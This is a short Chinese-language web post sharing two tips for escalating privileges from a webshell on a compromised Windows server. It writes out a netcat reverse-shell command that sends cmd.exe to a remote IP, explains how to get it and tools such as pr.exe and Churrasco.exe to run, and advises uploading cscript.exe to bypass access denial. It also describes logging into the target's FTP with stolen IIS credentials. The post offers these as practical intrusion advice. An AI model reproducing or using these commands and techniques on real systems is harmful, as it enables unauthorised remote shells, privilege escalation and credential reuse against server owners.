webshell下提权两个小技巧分享

2023-12-04 0 734

webshell提权小技巧 cmd路径: c:\\windows\\temp\\cmd.exe nc也在同目录下 例如反弹cmdshell: "c:\\windows\\temp\\nc.exe -vv ip 999 -e c:\\windows\\temp\\cmd.exe" 通常都不会成功。 而直接在 cmd路径上 输入 c:\\windows\\temp\\nc.exe 命令输入 -vv ip 999 -e c:\\windows\\temp\\cmd.exe 却能成功。。 这个不是重点 我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功。

友情检测波尔远程控制官方网站作者:MYC00l [Y.D.T]

第一处:把代码保存为1.vbs 上传到服务器上,执行cscript 1.vbs,又提示拒绝访问。

webshell下提权两个小技巧分享

其实这里,我们只要自己上传一个cscript.exe 一般就可以解决问题,这个程序默认位于系统文件夹下,是win32 控制台下的脚本宿主引擎,用来执行vbs 等脚本程序的。

第二处:用VBS脚本查看到目标IIS帐号和密码后,CMD下FTP发现目标用的是微软FTP,直接用IIS帐号和密码登录进去了。IIS帐号和密码和微软自带的FTP帐号和密码默认都是一样的。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 入侵防御 webshell下提权两个小技巧分享 https://www.u-9.cn/security/fangyu/72720.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务